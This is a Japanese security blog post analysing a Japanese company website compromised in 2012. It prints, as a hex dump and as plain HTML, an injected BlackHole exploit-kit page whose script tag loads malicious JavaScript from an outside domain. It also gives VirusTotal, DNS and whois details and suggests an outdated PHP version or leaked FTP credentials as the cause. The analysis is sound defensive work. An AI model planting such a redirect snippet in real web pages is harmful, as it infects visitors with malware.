hxxp://157.205.141.15/ABtH6Xj/index.html hxxp://www.qi-inc.com/ABtH6Xj/index.html感染されたIPは日本なので、下記のネットワークです↓
AS17514 JPNIC-JP-ASN-BLOCK Japan Network Information Center 157.205.0.0/16 OTSUKA CORPORATION X-Keiro: noc(at)aics.ad.jp下記のHTMLファイルを発見しました。
00000000 3c 68 74 6d 6c 3e 0d 0a 3c 68 31 3e 57 41 49 54 <html>..<h1>WAIT 00000010 20 50 4c 45 41 53 45 3c 2f 68 31 3e 0d 0a 20 3c PLEASE</h1>.. < 00000020 68 33 3e 4c 6f 61 64 69 6e 67 2e 2e 2e 3c 2f 68 h3>Loading...</h 00000030 33 3e 0d 0a 20 3c 73 63 72 69 70 74 20 74 79 70 3>.. <script typ 00000040 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 e="text/javascri 00000050 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f pt" src="hxxp:// 00000060 6d 65 6f 77 63 68 69 63 61 67 6f 2e 6e 65 74 2f meowchicago.net/ 00000070 48 6f 59 67 61 69 56 61 2f 6a 73 2e 6a 73 22 3e HoYgaiVa/js.js"> 00000080 3c 2f 73 63 72 69 70 74 3e 0a 0d 0a 3c 2f 68 74 </script>...</ht 00000090 6d 6c 3e ml>中身はマルウェア感染サイトにあるJSコードを実行される
<html><h1>WAIT PLEASE</h1><h3>Loading...</h3> <script type="text/javascript" src="hxxp://meowchicago.net/HoYgaiVa/js.js"> </script></html>感染URLのパターンを見たらBLACKHOLEの感染仕組みだと分かっています。
念のためにVirusTotalサイトに確認しましょう↓
MD5: c327e6944090ffc115a40beb659adb43
File size: 147 バイト ( 147 bytes )
File name: index.html
File type: HTML
Tags: html
Detection: 16 / 43 ←マルウェアが検知されますね!
URL: [CLICK]
File size: 147 バイト ( 147 bytes )
File name: index.html
File type: HTML
Tags: html
Detection: 16 / 43 ←マルウェアが検知されますね!
URL: [CLICK]
そのドメインは下記のIPに向いています(DNS情報)↓
;; QUESTION SECTION: ;www.qi-inc.com. IN A ;; ANSWER SECTION: www.qi-inc.com. 3600 IN A 157.205.141.15 ;; AUTHORITY SECTION: qi-inc.com. 3600 IN NS gntdns03.alpha-plt.jp. qi-inc.com. 3600 IN NS gntdns02.alpha-plt.jp. qi-inc.com. 3600 IN NS gntdns01.alpha-plt.jp.ネットワーク情報↓
inetnum: 157.205.0.0 - 157.205.255.255 netname: JOINUS-NET country: JP descr: Otsuka Corporation admin-c: OT27-AP tech-c: OT27-APですが、お名前.COMでドメインを取ったみたいですね↓
Domain Name: qi-inc.com Created On: 1996-09-21 00:00:00.0 Last Updated On: 2012-09-20 00:17:12.0 Expiration Date: 2013-09-20 04:00:00.0 Status: ACTIVE Registrant Name: QI Incorporated Registrant Organization: QI Incorporated Registrant Street1: 2-4-7 Fukuura Kanazawa-ku Registrant City: Yokohama-city Registrant State: kanagawa Registrant Postal Code: 236-0004 Registrant Country: JP Registrant Phone: 9999999999 Registrant Email: admin(at)onamae.comホームページまでに内容を確認しました↓
↑マルウェアサイトじゃないですね。何故感染URLが発見されたかと調査しました…
結果、古いPHPバーションの脆弱性が入っていますので、その経由で
BLACKHOLE(バーション2)にマルウェアページがインジェクトされた可能性があります。
もう一つ可能性として、FTPアカウントが漏れてしまいました。
提供されているPHPバーション情報をみたら古いバーションが使っていますね。
HTTP/1.1 200 OK Date: Thu, 27 Sep 2012 16:20:25 GMT Server: Apache X-Powered-By: PHP/4.4.1 ←結構古い Set-Cookie: PHPSESSID=9642b25059d9dcb79545e64eb5532aec; expires=Thu, 27 Sep 2012 17:20:25 GMT; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8
PHP/4.4.1の脆弱性は沢山ありますので、詳細な脆弱性の一覧は【こちらへ】
FTP情報が漏れた場合、私の海外研究者は新しい発見した物があり、ZeuSマルウェアが盗んだ個人情報のサイトです。イメージ的には【こちら】のウェブページへご覧下さい。
【2012年9月28日の追加情報】【重要】調査を続きましたが、結果:上記のマルウェアサイトに本事件のFTPアカウントを発見しましたので、早めにFTPアカウントを変更して下さい!お願いします。
Care if i repost this with English Translation?
返信削除Not at all!
返信削除